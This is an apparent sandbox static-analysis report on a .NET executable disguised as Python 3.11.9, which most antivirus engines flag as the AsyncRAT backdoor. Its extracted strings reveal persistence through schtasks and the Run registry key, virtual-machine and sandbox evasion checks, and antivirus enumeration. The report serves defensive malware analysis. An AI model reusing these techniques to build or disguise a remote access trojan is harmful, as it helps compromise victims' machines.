Static | ZeroBOX

PE Compile Time

2023-10-17 06:40:53

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000b064 0x0000b200 5.62039052507
.rsrc 0x0000e000 0x0002cd40 0x0002ce00 5.0622873902
.reloc 0x0003c000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x00036158 0x000042e4 LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON 0x0003a43c 0x00000092 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0003a4d0 0x000003dc LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0003a8ac 0x00000493 LANG_NEUTRAL SUBLANG_NEUTRAL exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
MapNameToOID
get_FormatID
get_ASCII
System.IO
get_IV
set_IV
GenerateIV
value__
mscorlib
xYSNgkEVLEjb
dWYtwyNzNkPc
DkJggeccPuKSc
YGPvHQSqzwfbtVc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
fzNSQtCUbDggtfd
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
OqOTKuNCaRee
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
aPfHEiovRxodog
set_ErrorDialog
ComputeHash
VerifyHash
WtatVgYyHvuwsh
get_ExecutablePath
GetTempPath
get_Length
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
btynVPrSWtdm
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
oVjyRQxjnm
Random
ICryptoTransform
wJIUmjNjbsm
ToBoolean
GjCNERsXAnran
X509Chain
AppDomain
get_CurrentDomain
pMXxmdSlDrkn
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
RfwDYfSNYwo
AfJuedNqeYQp
NYlesvvChQBLap
Microsoft.CSharp
System.Linq
GLCIJzPTuq
hODHTPVkTRNGTr
ufRIsUiurXUr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
jTmXSFzsfXmKtr
IntPtr
DzMUNexXnWur
AoeKFiSLLEs
hKVfbHcbqvCFs
rPEvyYQQLEIZZs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
XQJfMKRuXNLkhs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
pDwvcWKYqvpt
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
wHIQjWEIzsw
gjOOqQWxvw
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlLupefDoy
BlockCopy
ToBinary
get_SystemDirectory
Registry
XwGkTMyEzisy
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
HOGSNcGVoCinkty
IsNullOrEmpty
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
%AppData%
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Python Software Foundation
FileDescription
Python 3.11.9 (64-bit)
FileVersion
3.11.9150.0
InternalName
LegalCopyright
Copyright (c) Python Software Foundation. All rights reserved.
LegalTrademarks
OriginalFilename
ProductName
Python 3.11.9 (64-bit)
ProductVersion
3.11.9150.0
Assembly Version
3.11.9150.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Crysan.m!c
Elastic malicious (high confidence)
ClamAV Win.Packed.Razy-9625918-0
CMC Clean
CAT-QuickHeal Backdoor.MsilFC.S13564499
Skyhigh Fareit-FZT!7C9043F988EA
ALYac Gen:Variant.AsyncRat.Marte.10
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Backdoor:MSIL/AsyncRat.24df9f6d
K7GW Trojan ( 005678321 )
K7AntiVirus Trojan ( 005678321 )
huorong Backdoor/Crysan.a
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto Clean
Symantec Backdoor.ASync!g2
tehtris Clean
ESET-NOD32 a variant of MSIL/AsyncRAT.A
APEX Malicious
Avast Win32:MalwareX-gen [Drp]
Cynet Clean
Kaspersky HEUR:Backdoor.MSIL.Crysan.gen
BitDefender Gen:Variant.AsyncRat.Marte.10
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.AsyncRat.Marte.10
Tencent Trojan.Msil.Agent.zap
Sophos Troj/AsyncRat-B
F-Secure Heuristic.HEUR/AGEN.1360508
DrWeb Trojan.Siggen9.56514
VIPRE Gen:Variant.AsyncRat.Marte.10
TrendMicro Clean
McAfeeD Real Protect-LS!7C9043F988EA
Trapmine malicious.moderate.ml.score
CTX exe.trojan.msil
Emsisoft Gen:Variant.AsyncRat.Marte.10 (B)
Ikarus Backdoor.AsyncRat
GData MSIL.Trojan.PSE.1BITXMO
Jiangmin Backdoor.MSIL.gguk
Webroot Clean
Varist W32/MSIL_Troj.VJ.gen!Eldorado
Avira HEUR/AGEN.1360508
Antiy-AVL Clean
Kingsoft malware.kb.c.996
Gridinsoft Trojan.Win32.Packed.sa
Xcitium Clean
Arcabit Trojan.AsyncRat.Marte.10
SUPERAntiSpyware Clean
ZoneAlarm Troj/AsyncRat-B
Microsoft Backdoor:MSIL/AsyncRat.AD!MTB
Google Detected
AhnLab-V3 Trojan/Win32.RL_Generic.C3546893
Acronis Clean
McAfee Fareit-FZT!7C9043F988EA
TACHYON Clean
VBA32 OScope.Backdoor.MSIL.Crysan
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9V
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.CFQ!tr
AVG Win32:MalwareX-gen [Drp]
DeepInstinct MALICIOUS
alibabacloud Rat:Win/AsyncRAT.Stub
No IRMA results available.